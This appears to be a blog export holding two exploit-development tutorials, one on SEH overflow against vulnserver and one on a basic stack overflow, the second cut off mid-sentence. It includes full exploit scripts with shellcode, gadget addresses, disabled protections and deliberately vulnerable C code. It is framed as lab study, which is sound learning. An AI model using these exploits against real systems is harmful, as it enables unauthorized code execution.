[{"content":"Lab Setup Three things need to be sorted on the Windows lab machine before any of this works cleanly.\nAntivirus off. Shellcode and exploit scripts will be flagged and quarantined before they ever run. Real-time protection, tamper protection, SmartScreen, all of it needs to go. Turn off tamper protection first, then real-time protection. If you do it the other way around, Defender re-enables itself.\nASLR disabled system-wide. Windows randomizes module base addresses by default, which means every time the program runs, the modules load at different addresses. For foundational exploit development you need those addresses to stay the same between runs so any gadget address you hardcode in a payload is still valid the next time. This registry key forces that:\nreg add \u0026#34;HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management\u0026#34; /v MoveImages /t REG_DWORD /d 0 /f Reboot after applying it.\nDEP disabled for the target binary. Data Execution Prevention marks stack memory as non-executable at the OS level. If it is enabled, the CPU will refuse to execute code sitting on the stack even if you redirect execution there perfectly. For this lab the binary gets compiled without NX compatibility so the stack stays executable. In real targets this protection gets bypassed with ROP chains rather than compiled away, but that comes later.\nWhat is Structured Exception Handling? Windows has a built-in mechanism for handling errors at runtime. When something goes wrong inside a running process, like a null pointer dereference, a divide by zero, or an access violation, Windows does not just kill the process immediately. It first gives the process a chance to deal with the exception through a system called Structured Exception Handling, or SEH.\nIn C code you interact with SEH through __try and __except blocks:\n__try { // code that might crash strcpy(buf, input); } __except(EXCEPTION_EXECUTE_HANDLER) { // this runs if something goes wrong printf(\u0026#34;exception caught\\n\u0026#34;); } Under the hood the compiler translates this into a data structure that gets pushed onto the stack. That structure is called an _EXCEPTION_REGISTRATION_RECORD and it has exactly two fields:\n0:003\u0026gt; dt ntdll!_EXCEPTION_REGISTRATION_RECORD +0x000 Next : Ptr32 _EXCEPTION_REGISTRATION_RECORD +0x004 Handler : Ptr32 _EXCEPTION_DISPOSITION Next is a pointer to the next record in the chain. Handler is the address of the function to call when an exception occurs. Each record is 8 bytes. Multiple records are linked together on the stack forming a singly linked list. The last record in the chain has 0xffffffff as its Next pointer, which signals the end of the chain. If Windows walks the entire chain without any handler dealing with the exception, it gives up and calls WerFault.\nThe head of the chain is always stored at FS:[0] in the Thread Environment Block. In WinDbg you can verify this directly:\ndd fs:[0] And the !exchain command walks and displays the entire chain in a readable format.\nWhy SEH Overflows Are Different From Standard Stack Overflows In a standard stack overflow the overflow needs to reach the saved return address. The function then has to complete its execution and run through the epilogue before ret fires and redirects execution. If the stack is corrupted badly enough that the epilogue fails, the exploit fails.\nSEH exploitation does not have this problem. The goal is to overflow past the saved return address and keep going until the overflow reaches an SEH record sitting further up the stack. Once that record is overwritten with controlled values, the exploit triggers an exception on purpose, typically the access violation caused by the overflow itself. Windows then walks the SEH chain, finds the overwritten record, and calls the Handler address. If that address points to useful code, execution has been hijacked without the function ever needing to return cleanly.\nThis makes SEH-based exploitation more reliable in situations where the stack is heavily corrupted.\nThe Vulnerable Code Vulnserver\u0026rsquo;s GMON command handler checks the length of the received input before calling the vulnerable function:\n} else if (strncmp(RecvBuf, \u0026#34;GMON \u0026#34;, 5) == 0) { char GmonStatus[13] = \u0026#34;GMON STARTED\\n\u0026#34;; for (i = 5; i \u0026lt; RecvBufLen; i++) { if ((char)RecvBuf[i] == \u0026#39;/\u0026#39;) { if (strlen(RecvBuf) \u0026gt; 3950) { Function3(RecvBuf); } break; } } The input only reaches Function3 if it exceeds 3950 bytes. This matters later when we build the payload. Any payload shorter than 3950 bytes total will be silently ignored.\nFunction3 is where the actual vulnerability lives:\nvoid Function3(char *Input) { char Buffer2S[2000]; strcpy(Buffer2S, Input); } strcpy copies the full input into a 2000-byte buffer with no length check. Send more than 2000 bytes past the function call and it overflows Buffer2S, walks up the stack past saved EBP, past the return address, and eventually reaches SEH records sitting further up the stack.\nCrashing the Service and Finding Offsets The first step is sending a long cyclic pattern to trigger the crash and overwrite the SEH chain with known pattern bytes.\nimport socket import pwn pattern = pwn.cyclic(5000) s = socket.socket() s.connect((\u0026#34;192.168.122.85\u0026#34;, 9999)) s.recv(1024) s.send(b\u0026#34;GMON /.:/\u0026#34; + pattern) s.close() Note the prefix GMON /.:/ in the command. The / character is what triggers the length check inside the GMON handler. Without it the vulnerable code path is never reached.\nWith vulnserver running under WinDbg, the crash looks like this:\n(1ea0.14d0): Access violation - code c0000005 (first chance) eax=7efefefe ebx=0000013c ecx=007c45c8 edx=7a6a6261 esi=00401848 edi=00f80000 eip=77aab649 esp=00f7f1d4 ebp=00f7f9c4 msvcrt!strcat+0x89: 77aab649 8917 mov dword ptr [edi],edx Running !exchain shows the overwritten SEH chain:\n0:003\u0026gt; !exchain 00f7ffcc: 6e6a6261 Invalid exception stack at 6d6a6261 Both fields of the SEH record contain cyclic pattern bytes. Using pwntools to find the offsets:\npwn cyclic -l 0x6e6a6261 # 3547 -\u0026gt; handler offset pwn cyclic -l 0x6d6a6261 # 3543 -\u0026gt; nSEH offset The nSEH field (Next) starts at offset 3543 from the beginning of the input. The Handler field starts at offset 3547, four bytes later.\nVerifying with marker values:\nnseh = struct.pack(\u0026#34;\u0026lt;I\u0026#34;, 0xbeefdead) handler = struct.pack(\u0026#34;\u0026lt;I\u0026#34;, 0xdeadbeef) payload = b\u0026#34;A\u0026#34; * 3543 payload += nseh payload += handler payload += b\u0026#34;A\u0026#34; * (3950 - len(payload)) Result:\n0:003\u0026gt; !exchain 00f5ffcc: deadbeef \u0026lt;- handler confirmed at offset 3547 Invalid exception stack at beefdead \u0026lt;- nSEH confirmed at offset 3543 Both offsets confirmed.\nHow Windows Calls the Handler Understanding exactly what happens when Windows calls the exception handler is critical for understanding why POP POP RET works.\nWhen an exception fires, Windows calls the registered Handler function like a standard cdecl call. Before jumping to it, Windows pushes four arguments onto the stack. The handler\u0026rsquo;s signature is:\nEXCEPTION_DISPOSITION handler( EXCEPTION_RECORD *ExceptionRecord, // [ESP+4] info about the exception void *EstablisherFrame, // [ESP+8] address of the SEH record CONTEXT *ContextRecord, // [ESP+12] full CPU state at crash time void *DispatcherContext // [ESP+16] internal dispatcher info ); At the moment the handler starts executing, the stack looks like this:\nHigh Address [ DispatcherContext ptr ] [ESP+16] [ ContextRecord ptr ] [ESP+12] [ EstablisherFrame ptr ] [ESP+8] \u0026lt;- points directly at the nSEH field [ ExceptionRecord ptr ] [ESP+4] [ return address ] [ESP] \u0026lt;- ESP points here Low Address The second argument, EstablisherFrame at [ESP+8], holds the address of the SEH record being dispatched. That is the address of the nSEH field, which is exactly where the jump to shellcode needs to be placed.\nYou can inspect the EXCEPTION_RECORD and CONTEXT structures directly in WinDbg:\n0:003\u0026gt; dt ntdll!_EXCEPTION_RECORD +0x000 ExceptionCode : Int4B +0x004 ExceptionFlags : Uint4B +0x008 ExceptionRecord : Ptr32 _EXCEPTION_RECORD +0x00c ExceptionAddress : Ptr32 Void +0x010 NumberParameters : Uint4B 0:003\u0026gt; dt ntdll!_CONTEXT +0x000 ContextFlags : Uint4B +0x09c Edi : Uint4B +0x0a0 Esi : Uint4B +0x0b8 Eip : Uint4B +0x0c4 Esp : Uint4B The CONTEXT structure contains a full snapshot of every CPU register at the moment the exception occurred. A legitimate handler would use this to inspect what went wrong and potentially resume execution. For exploitation purposes, none of it matters. The only thing that matters is EstablisherFrame at [ESP+8].\nPOP POP RET Explained A direct RET from the handler would pop whatever is at ESP into EIP. At that moment ESP points at the return address, which goes back into Windows exception dispatcher code. That is not useful.\nTwo POP instructions move ESP forward by 8 bytes total, skipping past the return address and the ExceptionRecord pointer. After two pops, ESP is pointing at EstablisherFrame. Then RET pops that value into EIP and the CPU jumps to the nSEH field.\nWalking through it step by step:\n; Starting state: ESP points at return address POP ECX ; read [ESP] into ECX (discarded), ESP moves to [ESP+4] POP ECX ; read [ESP] into ECX (discarded), ESP moves to [ESP+8] RET ; read [ESP] into EIP (EstablisherFrame = address of nSEH), jump there The register used for each POP does not matter at all. The values are thrown away. Any two-register combination works: POP ECX POP ECX, POP EBX POP EAX, POP EDI POP ESI. The only requirement is two POPs followed immediately by a RET.\nFinding a POP POP RET Gadget Not every module is safe to pull a gadget from. SafeSEH is a Windows protection that validates SEH handler addresses before calling them. If the handler address is not in the module\u0026rsquo;s SafeSEH table, Windows rejects it and the exploit fails.\nThe way to check a module for SafeSEH is by examining its PE header characteristics. essfunc.dll, the companion DLL that ships with vulnserver, has zero DLL characteristics:\n0:000\u0026gt; !dh 62500000 0 DLL characteristics 0 [0] address [size] of Load Configuration Directory Zero DLL characteristics means no SafeSEH flag. No Load Configuration Directory means no SafeSEH table. Addresses from essfunc are valid for SEH handler overwrites.\nSearching essfunc for POP POP RET (opcodes 59 59 C3):\n0:000\u0026gt; s 0x62500000 L0x8000 59 59 c3 6250120b 59 59 c3 5d c3 55 89 e5... The length 0x8000 comes from the module size in lm output: 62508000 - 62500000 = 8000.\nVerifying the gadget:\n0:000\u0026gt; u 0x6250120b L3 essfunc!EssentialFunc9+0xb: 6250120b 59 pop ecx 6250120c 59 pop ecx 6250120d c3 ret Confirmed. The address 0x6250120b contains no null bytes (62 50 12 0b), so strcpy will not truncate the payload at this point.\nThe Island Hopping Problem With the offsets and gadget confirmed, nSEH needs to contain a jump that eventually reaches shellcode. The natural instinct is to put shellcode right after the handler field and use a short forward jump in nSEH. But there is a serious problem with that approach.\nAfter the SEH record at offset 3547, the stack is very close to a page boundary. There are only a handful of bytes of mapped memory before 0x01000000. A 220-byte shellcode simply does not fit.\nThe shellcode needs to live in the filler area before the SEH record, where there is over 3500 bytes of available space. But nSEH is only 4 bytes, and a short jump (\\xeb) can only reach 127 bytes forward or 128 bytes backward. Shellcode at the start of the payload is thousands of bytes away.\nThe solution is a two-stage jump called island hopping:\nnSEH contains a short jump backward 128 bytes, landing in the filler area At the landing point, a near jump (\\xe9) with a 4-byte signed offset jumps all the way back to the NOP sled A near jump can reach plus or minus 2GB. No distance restriction whatsoever.\nHere is the layout:\nOffset 0 : NOP sled (16 bytes) Offset 16 : Shellcode (220 bytes) Offset 236 : A filler Offset 3417 : Near jump (5 bytes, jumps back to offset 0) Offset 3422 : A filler Offset 3543 : nSEH = \\xeb\\x80\\x90\\x90 (short jump back 128 bytes to near jump) Offset 3547 : Handler = 0x6250120b (PPR gadget in essfunc.dll) Offset 3551 : A padding Total : 3950 bytes \\xeb\\x80 is the short jump. \\xeb is the opcode, \\x80 is the signed offset. In two\u0026rsquo;s complement, 0x80 is -128, meaning jump 128 bytes backward from the end of the instruction. The two \\x90 NOP bytes pad nSEH to the required 4 bytes.\nThe near jump offset calculation:\n# Near jump sits at offset 3417 # Target is offset 0 (start of NOP sled) # Offset = 0 - (3417 + 5) = -3422 # The +5 accounts for the 5-byte instruction itself near_jump = b\u0026#34;\\xe9\u0026#34; + struct.pack(\u0026#34;\u0026lt;i\u0026#34;, -3422) Execution Trace Full WinDbg trace of the exploit firing:\nPPR breakpoint hit:\nBreakpoint 0 hit eip=6250120b esp=010ce5d8 essfunc!EssentialFunc9+0xb: 6250120b 59 pop ecx First POP discards return address:\neip=6250120c esp=010ce5dc 6250120c 59 pop ecx Second POP discards ExceptionRecord pointer:\neip=6250120d esp=010ce5e0 6250120d c3 ret RET pops EstablisherFrame into EIP, landing on nSEH:\neip=010cffcc esp=010ce5e4 010cffcc eb80 jmp 010cff4e Short jump fires, lands on near jump in filler:\neip=010cff4e 010cff4e e9a2f2ffff jmp 010cf1f5 Near jump fires, lands in NOP sled:\neip=010cf1f5 010cf1f5 90 nop Memory at landing, NOP sled into shellcode:\n0:003\u0026gt; db eip L30 010cf1f5 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................ 010cf205 d9 cb bd 4a 6d 32 a0 d9-74 24 f4 5b 29 c9 b1 31 ...Jm2..t$.[)..1 010cf215 31 6b 18 83 eb fc 03 6b-5e 8f c7 5c b6 cd 28 9d 1k.....k^..\\..(. 16 NOPs followed immediately by the first bytes of the shikata_ga_nai encoded shellcode. The decoder runs, unpacks the payload, and calc.exe opens on the target.\nThe Full Exploit import socket import struct import sys TARGET_IP = \u0026#34;192.168.122.85\u0026#34; TARGET_PORT = 9999 def exploit(): print(f\u0026#34;[*] Target : {TARGET_IP}:{TARGET_PORT}\u0026#34;) print(f\u0026#34;[*] Gadget : PPR @ 0x6250120b (essfunc.dll, no SafeSEH)\u0026#34;) print(f\u0026#34;[*] Bad chars : \\\\x00\u0026#34;) print(f\u0026#34;[*] Encoder : x86/shikata_ga_nai\u0026#34;) print(f\u0026#34;[*] Payload : windows/exec CMD=calc.exe\u0026#34;) # msfvenom -p windows/exec CMD=calc.exe -b \u0026#34;\\x00\u0026#34; -f python buf = b\u0026#34;\u0026#34; buf += b\u0026#34;\\xd9\\xcb\\xbd\\x4a\\x6d\\x32\\xa0\\xd9\\x74\\x24\\xf4\\x5b\u0026#34; buf += b\u0026#34;\\x29\\xc9\\xb1\\x31\\x31\\x6b\\x18\\x83\\xeb\\xfc\\x03\\x6b\u0026#34; buf += b\u0026#34;\\x5e\\x8f\\xc7\\x5c\\xb6\\xcd\\x28\\x9d\\x46\\xb2\\xa1\\x78\u0026#34; buf += b\u0026#34;\\x77\\xf2\\xd6\\x09\\x27\\xc2\\x9d\\x5c\\xcb\\xa9\\xf0\\x74\u0026#34; buf += b\u0026#34;\\x58\\xdf\\xdc\\x7b\\xe9\\x6a\\x3b\\xb5\\xea\\xc7\\x7f\\xd4\u0026#34; buf += b\u0026#34;\\x68\\x1a\\xac\\x36\\x51\\xd5\\xa1\\x37\\x96\\x08\\x4b\\x65\u0026#34; buf += b\u0026#34;\\x4f\\x46\\xfe\\x9a\\xe4\\x12\\xc3\\x11\\xb6\\xb3\\x43\\xc5\u0026#34; buf += b\u0026#34;\\x0e\\xb5\\x62\\x58\\x05\\xec\\xa4\\x5a\\xca\\x84\\xec\\x44\u0026#34; buf += b\u0026#34;\\x0f\\xa0\\xa7\\xff\\xfb\\x5e\\x36\\xd6\\x32\\x9e\\x95\\x17\u0026#34; buf += b\u0026#34;\\xfb\\x6d\\xe7\\x50\\x3b\\x8e\\x92\\xa8\\x38\\x33\\xa5\\x6e\u0026#34; buf += b\u0026#34;\\x43\\xef\\x20\\x75\\xe3\\x64\\x92\\x51\\x12\\xa8\\x45\\x11\u0026#34; buf += b\u0026#34;\\x18\\x05\\x01\\x7d\\x3c\\x98\\xc6\\xf5\\x38\\x11\\xe9\\xd9\u0026#34; buf += b\u0026#34;\\xc9\\x61\\xce\\xfd\\x92\\x32\\x6f\\xa7\\x7e\\x94\\x90\\xb7\u0026#34; buf += b\u0026#34;\\x21\\x49\\x35\\xb3\\xcf\\x9e\\x44\\x9e\\x85\\x61\\xda\\xa4\u0026#34; buf += b\u0026#34;\\xeb\\x62\\xe4\\xa6\\x5b\\x0b\\xd5\\x2d\\x34\\x4c\\xea\\xe7\u0026#34; buf += b\u0026#34;\\x71\\x9f\\x71\\x97\\xed\\x48\\xdc\\x32\\x50\\x15\\xdf\\xe8\u0026#34; buf += b\u0026#34;\\x96\\x20\\x5c\\x19\\x66\\xd7\\x7c\\x68\\x63\\x93\\x3a\\x80\u0026#34; buf += b\u0026#34;\\x19\\x8c\\xae\\xa6\\x8e\\xad\\xfa\\xc4\\x51\\x3e\\x66\\x25\u0026#34; buf += b\u0026#34;\\xf4\\xc6\\x0d\\x39\u0026#34; ppr_gad = struct.pack(\u0026#34;\u0026lt;I\u0026#34;, 0x6250120b) # POP ECX POP ECX RET in essfunc.dll nseh = b\u0026#34;\\xeb\\x80\\x90\\x90\u0026#34; # short jump back 128 bytes + 2 NOPs near_jump = b\u0026#34;\\xe9\u0026#34; + struct.pack(\u0026#34;\u0026lt;i\u0026#34;, -3422) # near jump back to NOP sled payload = b\u0026#34;\\x90\u0026#34; * 16 # NOP sled at offset 0 payload += buf # shellcode at offset 16 payload += b\u0026#34;A\u0026#34; * (3417 - len(payload)) # filler up to near jump payload += near_jump # near jump at offset 3417 payload += b\u0026#34;A\u0026#34; * (3543 - len(payload)) # filler up to nSEH payload += nseh # nSEH at offset 3543 payload += ppr_gad # handler at offset 3547 payload += b\u0026#34;A\u0026#34; * (3950 - len(payload)) # padding to trigger vulnerable path print(f\u0026#34;[*] Payload : {len(payload)} bytes\u0026#34;) print(f\u0026#34;[*] Layout : [NOP x16][Shellcode][Filler][NearJump][Filler][nSEH][PPR][Pad]\u0026#34;) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, TARGET_PORT)) print(f\u0026#34;[+] Connected\u0026#34;) s.recv(1024) s.send(b\u0026#34;GMON /.:/\u0026#34; + payload) print(f\u0026#34;[+] Payload sent\u0026#34;) s.close() print(f\u0026#34;[+] Done. Check target for calc.exe\u0026#34;) except ConnectionRefusedError: print(f\u0026#34;[-] Connection refused. Is the service running?\u0026#34;) sys.exit(1) except Exception as e: print(f\u0026#34;[-] Error: {e}\u0026#34;) sys.exit(1) if __name__ == \u0026#34;__main__\u0026#34;: exploit() Payload Layout Offset 0-15 : NOP sled (16 bytes) Offset 16-235 : shikata_ga_nai encoded shellcode (220 bytes) Offset 236-3416 : A filler Offset 3417-3421 : Near jump \\xe9 (5 bytes, jumps back to offset 0) Offset 3422-3542 : A filler Offset 3543-3546 : nSEH = \\xeb\\x80\\x90\\x90 (short jump back 128 bytes) Offset 3547-3550 : Handler = 0x6250120b (POP POP RET in essfunc.dll) Offset 3551-3949 : A padding to reach minimum trigger length Total : 3950 bytes Key Takeaways SEH exploitation does not need the function to return cleanly. The overflow itself triggers the exception. Even a completely corrupted stack will still dispatch the exception and call the overwritten handler.\nPOP POP RET is a precise mechanism, not magic. The handler is called with four arguments pushed on the stack. Two POPs skip past the return address and ExceptionRecord pointer, leaving ESP pointing at EstablisherFrame, which holds the address of the SEH record. RET pops that into EIP and lands on nSEH.\nShort jumps only reach 128 bytes in either direction. When shellcode is thousands of bytes away, island hopping solves it. Short jump to near jump, near jump to shellcode. Each hop is limited but together they cover arbitrary distance.\nSafeSEH rejects handler addresses not listed in a module\u0026rsquo;s SafeSEH table. Always verify DLL characteristics and Load Configuration Directory before choosing a module as a gadget source. A module with zero DLL characteristics and no Load Configuration Directory is not SafeSEH protected.\nPayload size matters for triggering the vulnerable code path. The GMON handler only calls Function3 when the input exceeds 3950 bytes. Sending less does nothing. Always match payload length to what caused the original crash.\nThe minimum payload size being 3950 bytes is also why the shellcode cannot live after the SEH record. There is almost no stack space left after offset 3950 before hitting a page boundary. Shellcode must live in the filler region before the SEH record and the jump chain must reach backward to it.\nThis exploit runs against a deliberately vulnerable lab binary compiled without modern mitigations. It is a learning exercise.\n","permalink":"https://4w4647.github.io/posts/seh-overflows-hijacking-windows-exception-handlers/","summary":"\u003ch2 id=\"lab-setup\"\u003eLab Setup\u003c/h2\u003e\n\u003cp\u003eThree things need to be sorted on the Windows lab machine before any of this works cleanly.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eAntivirus off.\u003c/strong\u003e Shellcode and exploit scripts will be flagged and quarantined before they ever run. Real-time protection, tamper protection, SmartScreen, all of it needs to go. Turn off tamper protection first, then real-time protection. If you do it the other way around, Defender re-enables itself.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eASLR disabled system-wide.\u003c/strong\u003e Windows randomizes module base addresses by default, which means every time the program runs, the modules load at different addresses. For foundational exploit development you need those addresses to stay the same between runs so any gadget address you hardcode in a payload is still valid the next time. This registry key forces that:\u003c/p\u003e","title":"SEH Overflows - Hijacking Windows Exception Handlers"},{"content":"Lab Setup Three things need to be sorted on the Windows lab machine before any of this works cleanly.\nAntivirus off. Shellcode and exploit scripts will be flagged and quarantined before they ever run. Real-time protection, tamper protection, SmartScreen, all of it needs to go. Turn off tamper protection first, then real-time protection. If you do it the other way around, Defender re-enables itself.\nASLR disabled system-wide. Windows randomizes module base addresses by default, which means every time the program runs, the modules load at different addresses. For foundational exploit development you need those addresses to stay the same between runs so any gadget address you hardcode in a payload is still valid the next time. This registry key forces that:\nreg add \u0026#34;HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Memory Management\u0026#34; /v MoveImages /t REG_DWORD /d 0 /f Reboot after applying it.\nDEP disabled for the target binary. Data Execution Prevention marks stack memory as non-executable at the OS level. If it is enabled, the CPU will refuse to execute code sitting on the stack even if you redirect execution there perfectly. For this lab the binary gets compiled without NX compatibility so the stack stays executable. In real targets this protection gets bypassed with ROP chains rather than compiled away, but that comes later.\nThe Vulnerable Service #include \u0026lt;stdio.h\u0026gt; #include \u0026lt;string.h\u0026gt; #include \u0026lt;winsock2.h\u0026gt; void vulnerable(char *input) { char buf[64]; printf(\u0026#34;[*] Copying input into buf[64]...\\n\u0026#34;); strcpy(buf, input); printf(\u0026#34;[+] Done. You entered: %s\\n\u0026#34;, buf); } int main() { WSADATA wsa; SOCKET s, client; struct sockaddr_in server, addr; int addrlen = sizeof(addr); char input[1024]; WSAStartup(MAKEWORD(2, 2), \u0026amp;wsa); s = socket(AF_INET, SOCK_STREAM, 0); server.sin_family = AF_INET; server.sin_addr.s_addr = INADDR_ANY; server.sin_port = htons(4444); bind(s, (struct sockaddr *)\u0026amp;server, sizeof(server)); listen(s, 1); printf(\u0026#34;[*] Listening on port 4444...\\n\u0026#34;); client = accept(s, (struct sockaddr *)\u0026amp;addr, \u0026amp;addrlen); printf(\u0026#34;[+] Connection accepted\\n\u0026#34;); recv(client, input, sizeof(input), 0); printf(\u0026#34;[*] Received input, passing to vulnerable()\\n\u0026#34;); vulnerable(input); closesocket(client); WSACleanup(); return 0; } The vulnerability is in vulnerable(). The line strcpy(buf, input) copies whatever came in over the network into a 64-byte buffer with no length check whatsoever. strcpy keeps copying bytes until it hits a null byte in the source, regardless of how large the destination is. Send more than 64 bytes and it writes straight past the end of buf into whatever memory sits above it on the stack.\nWhat sits above it turns out to be the saved base pointer and then the return address. And that is where things get interesting.\nCompiled from Linux with protections stripped:\ni686-w64-mingw32-gcc -o vuln.exe vuln.c \\ -fno-stack-protector \\ -mpreferred-stack-boundary=2 \\ -lws2_32 \\ -Wl,--disable-nxcompat What each flag does:\n-fno-stack-protector disables stack canaries. These are values the compiler inserts between the buffer and the return address that get checked before the function returns. If they are corrupted, the process aborts before ret even executes. -mpreferred-stack-boundary=2 uses 4-byte stack alignment instead of 16-byte. Keeps the frame layout clean and predictable. -lws2_32 links the Windows Sockets library for the network code. -Wl,--disable-nxcompat tells the linker to mark the binary as not requiring DEP. Without this flag, DEP applies and the stack is non-executable. The Stack Frame Before calculating offsets there needs to be a clear picture of what the stack looks like when vulnerable() is running.\nWhen main() calls vulnerable(input), the cdecl calling convention applies. The caller pushes the argument (a 4-byte pointer to input) onto the stack, then executes CALL. The CALL instruction pushes the return address (the address of the next instruction in main) and jumps to vulnerable:\npush input_pointer ; 4-byte pointer to input buffer call vulnerable ; pushes return address, jumps to function Inside vulnerable(), the prologue sets up the stack frame:\npush ebp ; save caller\u0026#39;s base pointer mov ebp, esp ; anchor EBP to current stack top sub esp, 64 ; reserve 64 bytes for buf After the prologue finishes, the stack looks like this:\nHigh Address ┌──────────────────┐ │ input pointer │ [ebp+8] argument pushed by caller ├──────────────────┤ │ return address │ [ebp+4] pushed by CALL ├──────────────────┤ │ saved EBP │ [ebp] EBP register points here ├──────────────────┤ │ │ │ buf[64] │ 64 bytes of local buffer │ │ │ │ ESP points here └──────────────────┘ Low Address The stack grows downward toward lower addresses. buf sits below saved EBP in memory. When strcpy writes into buf, it starts at the bottom of the buffer and fills upward, heading straight toward saved EBP and then the return address.\nThe offset math is straightforward:\n64 bytes buf itself 4 bytes saved EBP above buf --------- 68 bytes total to reach the return address Bytes at offset 68 through 71 overwrite the return address. When the function\u0026rsquo;s epilogue runs and ret executes, it pops those 4 bytes into EIP. The CPU jumps to whatever address is there. Put a controlled address in those bytes and execution is hijacked.\nHow the Epilogue Still Works The overflow writes 0x41414141 over the saved EBP value on the stack. A reasonable question is whether this breaks the epilogue before ret even fires.\nThe epilogue for vulnerable() is:\nmov esp, ebp ; collapse local frame, reset ESP pop ebp ; restore saved EBP from stack into EBP register ret ; pop return address into EIP The key detail is that mov esp, ebp reads from the EBP register, not from the saved value on the stack. The EBP register was set during the prologue with mov ebp, esp and was never touched again during the function body. It still holds the correct address pointing at the saved EBP location on the stack.\nSo the epilogue runs correctly. mov esp, ebp resets ESP to the right place. pop ebp loads the corrupted 0x41414141 into the EBP register, which breaks the caller\u0026rsquo;s frame, but by this point execution is being taken over so it does not matter. Then ret pops the overwritten return address into EIP and the CPU jumps there.\nConfirming EIP Control Theory needs to be verified. A quick script confirms the offset:\nimport socket payload = b\u0026#34;A\u0026#34; * 68 + b\u0026#34;B\u0026#34; * 4 + b\u0026#34;C\u0026#34; * 100 s = socket.socket() s.connect((\u0026#34;192.168.122.85\u0026#34;, 4444)) s.send(payload) s.close() 68 As to fill buf and overwrite saved EBP. 4 Bs at offset 68 to land on the return address. 100 Cs as padding.\nWinDbg crash output:\n(15cc.229c): Access violation - code c0000005 (second chance) eax=00000066 ebx=019e0df8 ecx=00000000 edx=00df0000 esi=019e0e88 edi=00000059 eip=42424242 esp=0126f8c4 ebp=41414141 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 42424242 ?? ??? EIP is 42424242 which is BBBB. EBP is 41414141 which is AAAA. The offset is confirmed at 68 bytes.\nThere is something else worth noting in the crash output. ESP is sitting at 0126f8c4 and it is pointing directly at the Cs. After ret pops the return address into EIP, ESP advances by 4 bytes and lands on whatever came immediately after the return address in the payload. That is attacker-controlled data sitting right at ESP. This is the mechanism that makes JMP ESP useful.\nFinding a JMP ESP Gadget With EIP control confirmed, the next step is figuring out where to redirect execution. The goal is to execute shellcode, and the shellcode will be placed right after the overwritten return address in the payload. At the moment ret fires, ESP points directly at that shellcode.\nSo what is needed is an instruction somewhere in memory that says \u0026ldquo;jump to whatever ESP points at.\u0026rdquo; In x86, JMP ESP does exactly that. Its opcode is two bytes: FF E4.\nThe challenge is finding a copy of those two bytes at an address that is stable and predictable. If the address changes between runs, the hardcoded value in the payload becomes wrong and the exploit crashes. This is exactly why ASLR was disabled earlier.\nStep 1: Find out what modules are loaded.\nIn WinDbg, the lm command lists all loaded modules with their start and end addresses:\n0:000\u0026gt; lm start end module name 00400000 0043c000 vuln 75c80000 75d47000 msvcrt 75de0000 75ed0000 KERNEL32 77640000 7790a000 KERNELBASE 77950000 77b0f000 ntdll Each line shows the start address, end address, and name of a loaded module. These are the regions of memory available to search for a gadget.\nStep 2: Calculate the search range.\nTo search a module for FF E4, the s command in WinDbg needs a start address and a length. The length is calculated by subtracting the start address from the end address.\nFor msvcrt:\nend - start = length 75d47000 - 75c80000 = c7000 So the search length for msvcrt is 0xc7000 bytes, which covers the entire module.\nStep 3: Search for the opcode.\n0:000\u0026gt; s 0x75c80000 L0xc7000 ff e4 75d099fd ff e4 00 00 57 e8 39 ee-fb ff 83 c4 14 8b bd 34 The s command syntax is s \u0026lt;start\u0026gt; L\u0026lt;length\u0026gt; \u0026lt;bytes\u0026gt;. WinDbg found FF E4 at address 0x75d099fd inside msvcrt.dll.\nStep 4: Verify it is actually JMP ESP.\nFinding the bytes is not enough. They need to be disassembled to confirm they form a valid instruction at that address:\n0:000\u0026gt; u 0x75d099fd L1 msvcrt!_winput_s_l+0xa5d: 75d099fd ffe4 jmp esp Confirmed. 0x75d099fd contains JMP ESP.\nStep 5: Verify the address is stable.\nWith ASLR disabled system-wide, restarting the program should load msvcrt at the same base address. Running lm across multiple sessions confirmed msvcrt consistently loading at 0x75c80000, which means 0x75d099fd is reliable.\nOne more check: the address itself must not contain any null bytes, because strcpy stops copying at 0x00. Looking at 75 d0 99 fd, there are no null bytes. The gadget address is clean.\nLittle-Endian Packing x86 is little-endian. Multi-byte values are stored in memory with the least significant byte at the lowest address. The address 0x75d099fd does not go into the payload as-is. It gets stored reversed: fd 99 d0 75.\nPython handles this with struct.pack:\nimport struct jmp_esp = struct.pack(\u0026#34;\u0026lt;I\u0026#34;, 0x75d099fd) # produces: b\u0026#39;\\xfd\\x99\\xd0\\x75\u0026#39; The \u0026lt; means little-endian. I is an unsigned 32-bit integer. Getting the byte order wrong loads a garbage address into EIP and the exploit crashes with no obvious indication of the cause.\nBad Character Enumeration strcpy stops at 0x00. Any null byte anywhere in the payload truncates everything that follows it. Other byte values might also get corrupted depending on how the service processes input, and shellcode containing a corrupted byte will silently fail mid-execution.\nThe process for finding bad characters is to send every possible byte value through the vulnerability and compare what arrives on the stack against what was sent:\nimport socket bad_chars = bytes(range(1, 256)) payload = b\u0026#34;A\u0026#34; * 68 + b\u0026#34;B\u0026#34; * 4 + bad_chars s = socket.socket() s.connect((\u0026#34;192.168.122.85\u0026#34;, 4444)) s.send(payload) s.close() After the crash, db esp L100 in WinDbg shows the raw bytes that landed on the stack. Comparing byte by byte against the expected sequence 01 02 03 ... fd fe ff reveals any bytes that went missing or got changed.\nFor this target, every byte from 0x01 through 0xff arrived intact. The only bad character is:\n0x00 — null terminator, kills strcpy immediately Generating Shellcode With bad characters confirmed, msfvenom generates shellcode that avoids them:\nmsfvenom -p windows/exec CMD=calc.exe -b \u0026#34;\\x00\u0026#34; -f python Found 11 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 220 (iteration=0) Payload size: 220 bytes shikata_ga_nai is a polymorphic XOR encoder. It wraps the shellcode in a self-decoding stub. When the shellcode runs, the decoder executes first. It XORs each encoded byte back to its original value and then jumps into the decoded shellcode. The encoded form sitting in the payload never actually contains the bad characters. They exist only in the decoded form that gets reconstructed at runtime in memory.\nThe Decoder Problem and the Fix shikata_ga_nai uses ESP as scratch space while it is decoding. It pushes and pops temporary values relative to ESP as part of the XOR loop. After JMP ESP fires, ESP points at the very first byte of the shellcode. The decoder starts running and its scratch writes land on top 